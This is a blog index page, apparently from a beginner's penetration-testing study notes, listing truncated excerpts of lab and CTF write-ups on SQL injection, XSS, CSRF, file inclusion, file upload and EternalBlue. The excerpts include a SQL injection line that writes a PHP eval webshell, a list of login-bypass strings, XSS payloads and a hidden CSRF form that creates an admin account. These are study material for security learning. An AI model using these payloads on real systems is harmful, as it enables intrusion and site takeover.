渗透学习
tacooo
懒成狗屎的菜狗
展开
-
php常用函数(持续更)
file_get_contents()file_get_contents() 函数把整个文件读入一个字符串中。和file()一样,不同的是 file_get_contents() 把文件读入一个字符串。file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。如果操作系统支持,还会使用内存映射技术来增强性能。file_get_contents(path,include_path,context,start,max_length)extrac..原创 2021-08-25 20:15:41 · 154 阅读 · 0 评论 -
crunch_kali命令
简单使用注意:所有用法中最大和最小长度必须要输入,不过对结果不影响crunch最短位数最长位数[字符集设置][options]生成3到4位的小写字母为元素的所有组合:crunch 3 4生成3到4位由字符串abcde开头,以字符串gggggg为结束的所有字符组合:crunch34abcde生成一个3到4位的密码,且都由1234中的4个数字组成:crunch 3 4 1234生成一个个人信息的字典,包括姓名,年龄,生日,城市等:cr...原创 2021-08-25 16:21:07 · 265 阅读 · 0 评论 -
反弹shell_DC-3_wp
反弹shell原理与实现(转自反弹shell原理与实现 - iouwenbo - 博客园 (cnblogs.com))什么是反弹shell?反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我原创 2021-08-20 17:26:55 · 690 阅读 · 1 评论 -
MySQL环境实操wp
拿到站点IP,无法访问,没有打开80端口扫一下端口,发现125端口是打开的瞅一眼,是个弹框登录,试试弱口令,不太行,抓包爆破试试发到intruder模块,这里提一下,发现这里有认证头,Basic后的一串字符应该是用户名:密码的base64加密,所以我们把Basic后边的圈起来进行爆破,我猜测有admin这个用户这里选择custom iterator类型在position1里添入admin,当然如果猜测还有可能是其他用户名也可以添加在positi...原创 2021-08-19 16:18:06 · 163 阅读 · 0 评论 -
SQL server提权_环境实操wp
拿到IP,先进去看看,发现啥都没有上nmap和御剑扫一下端口没扫到啥新鲜的端口,去8080端口看看是个登录框,试了试弱口令什么的都不行,上御剑扫一下目录发现一个www.zip,进去试试发现一个config文件拿到了数据库账号密码,登上去看看拿到一个key,再找找拿到管理员账号密码,从8080端口登进去看看没登上去,发现密码是拿md5加密了,解密一下为 woaini521成功登进去,拿到key找了找其他地方...原创 2021-08-17 20:19:09 · 288 阅读 · 0 评论 -
文件包含漏洞2_远程
我们将远程主机的1.txt文件传到了该主机,如果1.txt换成一句话木马,那么就可以连蚁剑了远程文件包含漏洞的危害原创 2021-08-13 17:32:11 · 169 阅读 · 0 评论 -
PTE_远程文件包含wp
一堆看不懂的东西,发现并没有本地文件包含的点试试远程文件包含,发现是可以的从远程服务器远程文件包含一个写了一句话木马的 1.txt发现 txt 被双写了,应该是服务器端自动添加了一个 .txt 后缀,所以我们去掉我们的后缀成功写入,执行命令,这里的 c 是我们一句话木马中自己写的哦显示 get it 查看源码,发现key值...原创 2021-08-13 17:28:25 · 568 阅读 · 1 评论 -
phar / zip 伪协议的应用wp
查看源码显示只能上传txt文件上传一个txt文件试试上传成功这里我们退回主页面,发现有一个LFI here,意思是:这里是文件包含,点进去发现页面和源码什么都没有退回主页面查看主页面源码,发现有提示 lfi.txt我们将刚刚的 lfi.php 改成 lfi.txt 试一试,发现有内容,意思是给file传了一次参数,给file传的参数不能为空,无论file名是什么,都在file名后加一个 .php 后缀,注释的意思是值允许php文件被包含...原创 2021-08-13 16:31:40 · 1771 阅读 · 1 评论 -
PTE_本地文件包含wp
进入题目,提示答案在根目录下的key.php文件中,所以我们最后只需要cat该文件应该就有key了开始答题,页面上没有什么有用信息查看该页面的源码,也没找到什么有用信息我们发现网页是使用文件包含的方法打开了view.html,我们可以访问view.html,然后查看源码发现用Hello传了一次参数,第四行进行了base64加密进行base64解密,发现是用POST方式以z0传参综上,我们一共需要传两次参数,第一次是Hello需要传参,这里随便给He原创 2021-08-13 15:01:41 · 708 阅读 · 0 评论 -
环境实操_本地文件包含
给了提示是我们要找的flag的路径是 include/flag打开网页开始疯狂点击寻找上边点几个,发现都是mod传参,试试文件包含不存在加../ 试试发现加的 ../ 并没有加上,应该是被过滤了,试试 ..\竟然给我转义成双写了 ,试试 ../ 双写,即 ..././发现写进去了,但没有出来,继续加成功拿到flag...原创 2021-08-13 11:33:40 · 152 阅读 · 0 评论 -
文件包含漏洞1_本地
文件包含常用函数 |-------本地文件包含 文件包含---| |-------远程文件包含本地文件包含../被过滤了,使用..\或者双写也可以这里采用了添加 .php 后缀的方法进行保护,我们可以使用00截断来绕过,即在 .txt后加上%00示例——04在第三关的基础上发现多了一个前缀action...原创 2021-08-13 11:00:18 · 185 阅读 · 0 评论 -
Web_文件上传2(DAY8)
常见文件上传点WebshellWebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。拆分开来看,“web”的含义显然是服务器开放的web服务,“shell”的含义是取得对服务器某种程度上操作权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程...原创 2021-08-12 15:13:25 · 201 阅读 · 0 评论 -
PTE_文件上传wp
上传.php抓包发到repeater改包这是截图的时候打错了,应该是jpeg,还是失败,改大写失败,改一句话成功,去试一试全选覆盖掉intercept右键然后把包放完还是没成功,没有解析重新之前所有步骤,尝试把phP改成php5然后继续Do intercept加放包发现可以解析了,但命令不执行,于是再试试把一句话的jm的单引号去掉,Do intercept,放包输入命令,执行了,接下来cat key.php就行了...原创 2021-08-12 15:01:15 · 531 阅读 · 0 评论 -
XSS过滤实操
第一关——直接输出第二关——value第二关需要闭合value,看源码应该是用双引号闭合的,但是发现不行,于是用单引号闭合试了试竟然可以,可能是环境问题吧。。。第三关——xss过滤简单input没有闭合,而且alert没了被过滤了成功第四关——xss简单过滤报错了,说明我们输入的某些语句触发了报错,一点一点删除语句尝试看看哪里错了发现删除alert()函数不报错了,说明程序设置了使用alert报错,我们换...原创 2021-08-10 17:47:21 · 1075 阅读 · 0 评论 -
存储型XSS_简单漏洞复现
首先随便注册一个账号登录写一篇邮件,邮件内容插入xss语句burpsuit抓包,发送到repeater,放包,发现script被过滤了所以改包改用<img src=1 onpointerout=alert(123)>这里我们去看看我们发布的内容是否双击以后有弹窗弹窗出现,说明有xss漏洞...原创 2021-08-10 14:12:41 · 417 阅读 · 0 评论 -
PTE_XSS(Day2)
JS消息框分为以下三种:alert("文本")confirm("文本")<script>var r=confirm("你选择了什么");if(r==true){alert('你选择了确认');}else{alert('你选择了取消');}</script>prompt("文本","默认值")XSS存储型注入这里发现单引号被过滤了,所以用 / 或者双引号代替单引号重定向...原创 2021-08-10 11:46:59 · 271 阅读 · 0 评论 -
PHPOK4.2.100_CSRF复现
使用管理员账户进后台创建一个能够添加管理员账户的表单<div style="display:none"><form action="http://xxx:xxx/admin.php?c=admin&f=save" id="poc" name="poc" method="post"><input type="hidden" name="id" value=""/><input type="hidden" name="account"原创 2021-08-10 09:26:21 · 231 阅读 · 0 评论 -
PTE_SSRF漏洞复现(Day1)
Web安全基础-请求伪造漏洞SSRF:服务器端请求伪造,由攻击者构造请求,由服务端发起请求的一个安全漏洞,能够请求到与它相连而与外网隔离的内部系统。攻击方式如下所示:1.信息收集:可以对外网、服务器所在的内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);2.执行指令:攻击运行在内网或本地的应用程序(比如溢出);3.信息收集:对内网Web应用进行指纹识别(比如识别企业内部的资产信息);4.执行指令:攻击内外网有漏洞的Web应用,主要使用httpget请求原创 2021-08-09 17:32:09 · 336 阅读 · 0 评论 -
Web_sql万能密码(DAY6)
先附上我收集的一些万能密码'or 1=1/*"or "a"="a"or 1=1--"or"=""or"="a'='a"or1=1--"or=or"''or'='or'') or ('a'='a'.).or.('.a.'='.a'or 1=1'or 1=1--'or 1=1/*'or"="a'='a'or' '1'='1''or''=''or''=''or''=''or'='1''or'='or''or.'a.'='a'or1=1--1'or'1'='1...原创 2021-08-04 17:43:00 · 243 阅读 · 0 评论 -
Web_PTE基础题目wp(DAY7)
这类题目看闭合,然后找过滤,绕过就行,看sql语句找过滤,然后正常步骤走就行了原创 2021-08-04 09:15:34 · 161 阅读 · 0 评论 -
Web_sql之宽字节注入(DAY7)
ASCII占用一个字符GBK 占用两个字符URL转码 %df宽字节注释过程' --> /'%df' --> %df/' --> %df%5c%23GBK编码%df%5c%27 -->運%27 -->運'%df%5c -->運原创 2021-08-03 14:20:41 · 89 阅读 · 0 评论 -
Web_二次注入(DAY6)
二次注入的使用场景是,大多数网站都会对用户输入的语句进行对特殊符号的过滤。例如:恶意用户构造的插入语句为1',经过这些函数的处理则变为1\',这样便可以防止用户向服务器插入数据时引发的一些恶意操作,但这只是中途过滤了一下,最终返回到数据库里面的数据还是1'如果管理者对取出的数据没有进行进一步的检验处理,服务器从数据库取出恶意数据,未经过滤就直接拼接SQL语句进行查询,就会发生了SQL二次注入二次注入流程1、注册test' or '1'='12、更新密码更新用户:test' or '1原创 2021-08-02 17:30:24 · 150 阅读 · 0 评论 -
Web_文件上传1_一句话木马(DAY6)
找注入点,判断类型,确认回显点后写入一句木马连接蚁剑?id=32 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,"<?php eval($_POST['jm']);?>",12,13,14,15 into outfile "/var/www/html/jm.php"查询一下jm.php是否已经上传右键添加数据把我们上传的地址写上去,连接密码是我们一句话木马上自己设置的,为js点添加,然..原创 2021-08-02 17:15:17 · 349 阅读 · 0 评论 -
Web——零基础Docker入门到放弃(Day10)
Docker简介Docker功能8个真实应用场景Docker官方资源原创 2021-07-31 09:05:42 · 178 阅读 · 0 评论 -
Web_SQL盲注_时间盲注(DAY5)
当数字型和字符型都没有回显和报错,就要用到时间盲注了先理解以下语句select if(1=2,'b',sleep(3));判断 if() 函数第一个参数是否正确,正确则执行第二个参数,错误则执行第三个参数这里停了五秒,说明报错了,所以我们根据这个原理改变第一个参数去猜我们需要的数据例如猜数据库名的长度,判断是否数据库名长度大于1,没有延迟则猜测正确判断数据库名的长度是否,延迟了我们设置的5秒,说明猜测错误,然后结合布尔盲注的思路猜猜猜猜猜猜猜...原创 2021-07-30 17:26:18 · 133 阅读 · 0 评论 -
Web_SQL盲注_布尔盲注(下方有实操)(DAY5)
盲注常用函数:left(a,b)从左侧截取 a 的前 b 位substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位ascii(str)返回给定字符的ascii值,如 ascii("a")=97ord()函数同 ascii(),将字符转为 ascii 值length(str)返回给定字符串的长度,如 length("string")=6substr(a,b,c)图中在当前mysql数据库的库...原创 2021-07-30 17:00:07 · 268 阅读 · 0 评论 -
sqli dumb series-25 (绕过AND OR 过滤)
进入网页发现正中间写了or和and被过滤了首先判断不是数字型,为字符型注入这里记录一下 and 和 or 的过滤方式:and --> ananddor --> oorr原创 2021-07-30 09:04:32 · 205 阅读 · 0 评论 -
Web_零基础入门sql注入_联合注入(DAY4)
拉取WordPressdocker pull wordpress:latestdocker pull wordpress:latest原创 2021-07-29 16:46:15 · 157 阅读 · 0 评论 -
Web_docker搭建wordpress(DAY3)
拉取WordPressdocker pull wordpress:latest拉取MySQLdocker pull mysql:latest启动MySQLdocker run --name 123456 -e MYSQL_ROOT_PASSWORD=123456 -d mysql:latest启动WordPressdocker run --name w123456 --link w123456:mysql -p 8080:80 -d wordpress.原创 2021-07-29 10:20:59 · 164 阅读 · 0 评论 -
Web_docker加速(DAY3)
登录阿里云,点击右上角控制台找到容器镜像服务,点击进入找到镜像加速器得到自己专属的镜像加速器地址可以通过修改darmon配置文件/etc/docker/如果没有该文件,就自己创建一个touch daemon.json编辑daemon.json文件将得到的镜像加速器地址写入vim daemon.json载入配置sudo systemctl daemon-reload重启docker环境sudo systemctl r...原创 2021-07-28 15:39:14 · 86 阅读 · 0 评论 -
Web_docker_从vulhub拉取镜像并使用(DAY3)
首先下载好vulhub下载成功后,cd到vulhub目录cd vulhubls 命令查看漏洞靶场随便进入一个目录,任意选择镜像这里以我随便选择的镜像为例修改docker-conpose文件,把端口改成未使用的端口,例如8089:80vim docker-compose.yml 启动环境docker compose -d查看启动环境,发现端口为之前我们改成的8089:80docker-compose ps查看kali的ip,主机浏览器访问...原创 2021-07-28 15:22:00 · 546 阅读 · 0 评论 -
Web_kali2020下配置Docker并拉取vulhub(DAY3)
安装GPG证书,换源curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list更新APTsu原创 2021-07-28 10:43:06 · 282 阅读 · 0 评论 -
Web_ctf_git泄露
打开网址发现以下信息御剑扫描扫到index.php猜测为git泄露打开kali使用Git Hack工具python2 GitHack.py http://xxxxxxxxxxxxxx.com/index.php/.git/得到隐藏文件index.phpcat打开得到flag原创 2021-07-27 17:24:56 · 198 阅读 · 0 评论 -
Web_信息搜集(DAY2)
KALI whatweb功能域名查询爱站:dns.aizhan.com站长之家 :tool.chinaz.comwhois命令子域名查询http://tool.chinaz.com/subdomain备案号查询tianyancha.com主机信息搜索主机开放的端口和服务主机的操作系统识别常见端口TCP端口(静态端口)TCP 0= ReservedTCP 1=TCP Port Service MultiplexerTCP 2..原创 2021-07-27 15:42:22 · 3781 阅读 · 0 评论 -
Web_永恒之蓝复现(DAY1)
永恒之蓝漏洞复现环境:kali2020(攻击机)、windows7(靶机)前期准备:1、windows7需要关掉防火墙2、两台主机网络连接都设置为NAT模式3、检查攻击机ip与靶机ip是否可以联网,是否可以相互ping通,是否处于同一网段漏洞复现:使用nmap去扫描目标机的端口开启情况:nmap -sS -sV 192.168.111.139发现靶机445端口为开放状态,存在永恒之蓝漏洞,且版本为win7-10打开msfmsfconso...原创 2021-07-27 15:41:48 · 194 阅读 · 0 评论 -
Web——中间件及基本配置(Day10)
IIS虚拟目录建立虚拟目录以后,能够访问到默认目录之外的目录,可以简化网站管理原创 2021-07-26 00:48:57 · 185 阅读 · 0 评论 -
Web——HTTP协议与状态码(Day10)
OSI网络七层协议HTTP响应组成HTTP状态码原创 2021-07-25 23:35:22 · 121 阅读 · 0 评论 -
Web——服务器架构及原理(Day10)
常见Web服务器与操作系统搭配IIS安装IISApache需要用到的命令安装站点配置口诀:读写执行421原创 2021-07-25 20:38:22 · 117 阅读 · 0 评论 -
Web——网络安全之通信安全_Oracle数据库(DAY9)
体系结构创建数据库创建数据表查询插入更新删除原创 2021-07-25 20:00:42 · 114 阅读 · 0 评论 -
Web——网络安全之通信安全_MongoDB数据库(DAY9)
MongoDB数据库的开机与连接查看数据库创建数据库创建集合查看集合插入文档查询文档更新文档删除文档原创 2021-07-25 19:44:17 · 92 阅读 · 0 评论